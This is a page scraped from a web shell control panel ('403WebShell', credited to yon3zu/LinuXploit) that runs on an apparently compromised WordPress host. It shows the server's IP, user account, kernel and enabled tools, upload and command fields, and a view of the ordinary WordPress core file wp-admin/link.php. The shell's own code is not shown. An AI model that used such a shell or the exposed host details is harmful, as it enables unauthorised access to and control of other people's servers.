//home/www/public
NameSizeLast ModifiedPermsActions
.render-cache-2026-07-08 11:53drwxr-xr-x (0755)
.tmb-2026-07-08 11:59drwxrwxrwx (0777)
wp-admin-2026-07-08 13:34drwxr-xr-x (0755)
wp-content-2026-07-09 05:01drwxr-xr-x (0755)
wp-includes-2026-07-09 07:44drwxr-xr-x (0755)
.htaccess233 B2026-07-09 03:46-rw-r--r-- (0644)
.htaccess.bak-20260615392 B2026-06-19 10:07-rw-r--r-- (0644)
index.php405 B2020-02-06 01:03-r--r--r-- (0444)
license.txt19.44 KB2025-12-31 18:37-rw-r--r-- (0644)
readme.html7.23 KB2026-01-09 06:17-rw-r--r-- (0644)
robots.txt75 B2026-06-15 08:44-rw-r--r-- (0644)
wp-blog-header.php351 B2020-02-06 01:03-rw-r--r-- (0644)
wp-comments-post.php2.27 KB2023-06-14 08:41-rw-r--r-- (0644)
wp-config.php3.93 KB2026-07-08 05:27-rw------- (0600)
wp-cron.php5.49 KB2024-08-02 14:10-rw-r--r-- (0644)
wp-links-opml.php2.43 KB2025-04-30 07:22-rw-r--r-- (0644)
wp-load.php3.84 KB2024-03-11 04:35-rw-r--r-- (0644)
wp-login.php50.63 KB2026-02-28 17:27-rw-r--r-- (0644)
wp-mail.php8.52 KB2025-04-02 16:55-rw-r--r-- (0644)
wp-settings.php31.88 KB2026-05-08 10:29-rw-r--r-- (0644)
wp-signup.php33.81 KB2026-02-17 11:35-rw-r--r-- (0644)
wp-trackback.php5.09 KB2025-08-19 07:00-rw-r--r-- (0644)
xmlrpc.php3.13 KB2024-11-08 10:22-rw-r--r-- (0644)
403WebShell
403Webshell
Server IP : 217.160.0.223  /  Your IP : 216.73.216.95
Web Server : Apache
System : Linux www 6.18.38-i1-ampere+ #1089 SMP Tue Jul 7 14:54:42 CEST 2026 aarch64
User : sws1073902667 ( 1073902667)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/www/public/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/www/public/wp-admin/link.php
<?php
/**
 * Manage link administration actions.
 *
 * This page is accessed by the link management pages and handles the forms and
 * Ajax processes for link actions.
 *
 * @package WordPress
 * @subpackage Administration
 */

/** Load WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';

$action  = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : '';
$cat_id  = ! empty( $_REQUEST['cat_id'] ) ? absint( $_REQUEST['cat_id'] ) : 0;
$link_id = ! empty( $_REQUEST['link_id'] ) ? absint( $_REQUEST['link_id'] ) : 0;

if ( ! current_user_can( 'manage_links' ) ) {
	wp_link_manager_disabled_message();
}

if ( ! empty( $_POST['deletebookmarks'] ) ) {
	$action = 'deletebookmarks';
}
if ( ! empty( $_POST['move'] ) ) {
	$action = 'move';
}
if ( ! empty( $_POST['linkcheck'] ) ) {
	$linkcheck = $_POST['linkcheck'];
}

$this_file = admin_url( 'link-manager.php' );

switch ( $action ) {
	case 'deletebookmarks':
		check_admin_referer( 'bulk-bookmarks' );

		// For each link id (in $linkcheck[]) change category to selected value.
		if ( count( $linkcheck ) === 0 ) {
			wp_redirect( $this_file );
			exit;
		}

		$deleted = 0;
		foreach ( $linkcheck as $link_id ) {
			$link_id = (int) $link_id;

			if ( wp_delete_link( $link_id ) ) {
				++$deleted;
			}
		}

		wp_redirect( "$this_file?deleted=$deleted" );
		exit;

	case 'move':
		check_admin_referer( 'bulk-bookmarks' );

		// For each link id (in $linkcheck[]) change category to selected value.
		if ( count( $linkcheck ) === 0 ) {
			wp_redirect( $this_file );
			exit;
		}
		$all_links = implode( ',', $linkcheck );
		/*
		 * Should now have an array of links we can change:
		 *     $q = $wpdb->query("update $wpdb->links SET link_category='$category' WHERE link_id IN ($all_links)");
		 */

		wp_redirect( $this_file );
		exit;

	case 'add':
		check_admin_referer( 'add-bookmark' );

		$redir = wp_get_referer();
		if ( add_link() ) {
			$redir = add_query_arg( 'added', 'true', $redir );
		}

		wp_redirect( $redir );
		exit;

	case 'save':
		$link_id = (int) $_POST['link_id'];
		check_admin_referer( 'update-bookmark_' . $link_id );

		edit_link( $link_id );

		wp_redirect( $this_file );
		exit;

	case 'delete':
		$link_id = (int) $_GET['link_id'];
		check_admin_referer( 'delete-bookmark_' . $link_id );

		wp_delete_link( $link_id );

		wp_redirect( $this_file );
		exit;

	case 'edit':
		wp_enqueue_script( 'link' );
		wp_enqueue_script( 'xfn' );

		if ( wp_is_mobile() ) {
			wp_enqueue_script( 'jquery-touch-punch' );
		}

		$parent_file  = 'link-manager.php';
		$submenu_file = 'link-manager.php';
		// Used in the HTML title tag.
		$title = __( 'Edit Link' );

		$link_id = (int) $_GET['link_id'];

		$link = get_link_to_edit( $link_id );
		if ( ! $link ) {
			wp_die( __( 'Link not found.' ) );
		}

		require ABSPATH . 'wp-admin/edit-link-form.php';
		require_once ABSPATH . 'wp-admin/admin-footer.php';
		break;

	default:
		break;
}

Youez - 2016 - github.com/yon3zu
LinuXploit